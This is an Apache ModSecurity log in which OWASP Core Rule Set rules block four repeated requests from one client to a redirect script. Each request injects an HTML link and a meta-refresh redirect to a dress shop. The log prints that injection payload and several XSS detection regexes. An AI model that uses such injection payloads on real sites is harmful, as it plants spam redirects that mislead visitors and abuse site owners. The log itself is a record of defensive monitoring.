[Mon May 11 19:55:48.381087 2026] [security2:error] [pid 1501883:tid 1501888] [client 27.78.84.116:52764] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYJDP5Q_-MBliRCAxTngAAAAM"]
[Mon May 11 19:55:48.381611 2026] [security2:error] [pid 1501883:tid 1501888] [client 27.78.84.116:52764] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYJDP5Q_-MBliRCAxTngAAAAM"]
[Mon May 11 19:55:48.381918 2026] [security2:error] [pid 1501883:tid 1501888] [client 27.78.84.116:52764] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYJDP5Q_-MBliRCAxTngAAAAM"]
[Mon May 11 19:55:50.621457 2026] [security2:error] [pid 1516058:tid 1516099] [client 27.78.84.116:53190] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYJiMeXtzav-mi9SycbAAAAMk"]
[Mon May 11 19:55:50.623269 2026] [security2:error] [pid 1516058:tid 1516099] [client 27.78.84.116:53190] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYJiMeXtzav-mi9SycbAAAAMk"]
[Mon May 11 19:55:50.625489 2026] [security2:error] [pid 1516058:tid 1516099] [client 27.78.84.116:53190] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWAS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYJiMeXtzav-mi9SycbAAAAMk"]
[Mon May 11 19:55:50.626182 2026] [security2:error] [pid 1516058:tid 1516099] [client 27.78.84.116:53190] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "O [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYJiMeXtzav-mi9SycbAAAAMk"]
[Mon May 11 19:55:50.627344 2026] [security2:error] [pid 1516058:tid 1516099] [client 27.78.84.116:53190] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYJiMeXtzav-mi9SycbAAAAMk"]
[Mon May 11 19:55:50.627811 2026] [security2:error] [pid 1516058:tid 1516099] [client 27.78.84.116:53190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYJiMeXtzav-mi9SycbAAAAMk"]
[Mon May 11 19:55:50.628888 2026] [security2:error] [pid 1516058:tid 1516099] [client 27.78.84.116:53190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYJiMeXtzav-mi9SycbAAAAMk"]
[Mon May 11 19:55:54.075847 2026] [security2:error] [pid 1501831:tid 1501855] [client 27.78.84.116:53864] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYKlNddpkriGUb6ZViRQAAARY"]
[Mon May 11 19:55:54.077193 2026] [security2:error] [pid 1501831:tid 1501855] [client 27.78.84.116:53864] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYKlNddpkriGUb6ZViRQAAARY"]
[Mon May 11 19:55:54.080325 2026] [security2:error] [pid 1501831:tid 1501855] [client 27.78.84.116:53864] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWAS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYKlNddpkriGUb6ZViRQAAARY"]
[Mon May 11 19:55:54.082666 2026] [security2:error] [pid 1501831:tid 1501855] [client 27.78.84.116:53864] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "O [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYKlNddpkriGUb6ZViRQAAARY"]
[Mon May 11 19:55:54.085651 2026] [security2:error] [pid 1501831:tid 1501855] [client 27.78.84.116:53864] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYKlNddpkriGUb6ZViRQAAARY"]
[Mon May 11 19:55:54.086107 2026] [security2:error] [pid 1501831:tid 1501855] [client 27.78.84.116:53864] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYKlNddpkriGUb6ZViRQAAARY"]
[Mon May 11 19:55:54.086964 2026] [security2:error] [pid 1501831:tid 1501855] [client 27.78.84.116:53864] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYKlNddpkriGUb6ZViRQAAARY"]
[Mon May 11 19:55:55.997468 2026] [security2:error] [pid 1534836:tid 1534881] [client 27.78.84.116:54385] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYK9eaRXe5lR8y0ZN_ygAAAUo"]
[Mon May 11 19:55:55.998104 2026] [security2:error] [pid 1534836:tid 1534881] [client 27.78.84.116:54385] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYK9eaRXe5lR8y0ZN_ygAAAUo"]
[Mon May 11 19:55:55.998284 2026] [security2:error] [pid 1534836:tid 1534881] [client 27.78.84.116:54385] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWAS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYK9eaRXe5lR8y0ZN_ygAAAUo"]
[Mon May 11 19:55:55.998402 2026] [security2:error] [pid 1534836:tid 1534881] [client 27.78.84.116:54385] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "O [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYK9eaRXe5lR8y0ZN_ygAAAUo"]
[Mon May 11 19:55:55.998594 2026] [security2:error] [pid 1534836:tid 1534881] [client 27.78.84.116:54385] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shop-hanghieu.com/cac-mau-dam-da-hoi-sang-trong/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYK9eaRXe5lR8y0ZN_ygAAAUo"]
[Mon May 11 19:55:55.999031 2026] [security2:error] [pid 1534836:tid 1534881] [client 27.78.84.116:54385] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYK9eaRXe5lR8y0ZN_ygAAAUo"]
[Mon May 11 19:55:55.999313 2026] [security2:error] [pid 1534836:tid 1534881] [client 27.78.84.116:54385] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIYK9eaRXe5lR8y0ZN_ygAAAUo"]
